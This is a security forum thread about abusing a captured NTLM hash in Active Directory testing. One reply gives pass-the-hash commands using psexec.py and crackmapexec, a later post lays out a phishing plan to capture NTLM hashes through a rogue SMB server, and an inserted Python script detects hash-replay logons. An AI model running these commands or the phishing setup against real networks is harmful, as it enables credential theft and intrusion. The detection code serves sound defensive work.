What can one do with a user’s NTHASH?

I have a valid username, domain name and an NTHASH. I do not have the password. I have kept it for cracking, and Responder so far did not help (WPAD is blocked by policy it seems, or by the default IE / Win11/10 setting), but in the meantime is it possible for me to use the NTHASH and enumerate usernames and domain admins? I tried ‘cme’ and it gave me some users via RID brute force and the password policy - that’s it.

rpcclient, despite my providing the NTHASH, asks for the password.

smbclient does not play ball.

Any other options to use NTHASH?

Can I do anything with the original user’s system - they use MacOS though.

Furthermore, is it possible for me to use this with bloodhound and sense where the admins are logged into and where?

Apologies for asking too many questions.

I am picking up network testing after 9 years! Everything is different, but some things are the same. Any help/lead would be appreciated.

Thank you.

1 Like

Sorry, haven’t really looked into NTHASH all that much. Maybe HackTricks could lend a hand? (you can search directly by service you want to test or NTHASH). It’s a pretty nice resource and I recommend it. Hope someone with more knowledge can come around and help you more. Cheers and gl!

Try the pass-the-hash technique. For example, I found that the NT hash for the user f00 is c46b9e588fa0d112de6f59fd6d58eae3. This account is part of a group which is the local administrator of all the users’ workstations. We can replay it on another machine using the psexec.py tool.

$: psexec.py -hashes :c46b9e588fa0d112de6f59fd6d58eae3 [email protected] whoami

You can use the CrackMapExec tool to automate authentication against different targets:

# Local administration account
crackmapexec smb --local-auth -u Administrateur -H 20cc650a5ac276a1cfc22fbc23beada1 10.10.0.1 -x whoami

# Domain account
crackmapexec smb -u foo -H c46b9e588fa0d112de6f59fd6d58eae3 -d 0x00.local 10.10.0.0 -x whoami

2 Likes
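As an added defensive example (not code from the thread), a hash replay swept across targets the way the crackmapexec loop above does leaves a recognisable trail on the target side: one account performing NTLM network logons (Security Event 4624, LogonType 3) against many distinct computers within a short window. The sample events are constructed, the field names follow the 4624 event schema as a log shipper would flatten them, and the five-minute window and three-host threshold are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample (not from the thread): Security Event 4624 records
# flattened to key=value fields, as a log shipper would emit them.
SAMPLE_EVENTS = [
    "ts=2024-05-01T10:00:01 Computer=WS01 EventID=4624 LogonType=3 AuthenticationPackageName=NTLM TargetUserName=foo IpAddress=10.10.0.50",
    "ts=2024-05-01T10:00:02 Computer=WS02 EventID=4624 LogonType=3 AuthenticationPackageName=NTLM TargetUserName=foo IpAddress=10.10.0.50",
    "ts=2024-05-01T10:00:02 Computer=WS03 EventID=4624 LogonType=3 AuthenticationPackageName=NTLM TargetUserName=foo IpAddress=10.10.0.50",
    "ts=2024-05-01T10:00:03 Computer=FS01 EventID=4624 LogonType=3 AuthenticationPackageName=NTLM TargetUserName=foo IpAddress=10.10.0.50",
    # Normal activity: a Kerberos network logon and an interactive logon by other users.
    "ts=2024-05-01T10:00:04 Computer=FS01 EventID=4624 LogonType=3 AuthenticationPackageName=Kerberos TargetUserName=alice IpAddress=10.10.0.77",
    "ts=2024-05-01T10:00:05 Computer=WS09 EventID=4624 LogonType=2 AuthenticationPackageName=Negotiate TargetUserName=bob IpAddress=-",
    # Same account hours later against a single host: outside the window, not a sweep.
    "ts=2024-05-01T14:00:00 Computer=WS05 EventID=4624 LogonType=3 AuthenticationPackageName=NTLM TargetUserName=foo IpAddress=10.10.0.50",
]

def parse(line):
    """Split one key=value line into a dict and parse its timestamp."""
    fields = dict(tok.split("=", 1) for tok in line.split())
    fields["ts"] = datetime.fromisoformat(fields["ts"])
    return fields

def find_ntlm_sweeps(lines, window=timedelta(minutes=5), min_hosts=3):
    """Return {(account, source_ip): sorted hosts} for every account that logged
    on over NTLM (network logon, type 3) to at least min_hosts distinct computers
    within `window`. Kerberos and interactive logons are ignored."""
    hits = defaultdict(list)  # (user, source ip) -> [(ts, computer), ...]
    for ev in map(parse, lines):
        if ev["EventID"] == "4624" and ev["LogonType"] == "3" \
                and ev["AuthenticationPackageName"] == "NTLM":
            hits[(ev["TargetUserName"], ev["IpAddress"])].append((ev["ts"], ev["Computer"]))
    sweeps = {}
    for key, events in hits.items():
        events.sort()
        # Slide a window over the time-ordered logons and count distinct hosts.
        for i, (start, _) in enumerate(events):
            hosts = {c for t, c in events[i:] if t - start <= window}
            if len(hosts) >= min_hosts:
                sweeps[key] = sorted(hosts)
                break
    return sweeps

if __name__ == "__main__":
    for (user, ip), hosts in find_ntlm_sweeps(SAMPLE_EVENTS).items():
        print(f"possible hash replay: {user} from {ip} -> {', '.join(hosts)}")
```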

Thank you for the replies. Appreciated.

Unfortunately, the user I have is not an administrator anywhere on any Windows system in the domain except for their own MacOS system.
My enquiry was more along the lines of how to list all users, admins etc. on the domain controller using a username and the corresponding NTHASH.

I know one can fire net user administrators /domain,
but for that one needs to be logged in using a domain account, which I am not. I just have one user’s hash.
Nevertheless I shall try the above. Thank you.

Hey, I know this is old, but I have a somewhat related question, except with Windows…

I have AD credentials to a low-privileges account and I am attempting to pivot to higher privilege accounts. After doing reconnaissance, I discovered that the AD allows NTLM authentication for backwards compatibility. I am attempting to use the pass-the-hash technique to compromise the NTLM hash for the higher privilege accounts. I have configured an HTML file containing a meta refresh tag (contained in an email), which will redirect the victim’s browser to a mock SMB server we own. As I’ve never configured an SMB server myself, would someone be able to explain how to configure the server to force/challenge NTLM authentication when connecting to it?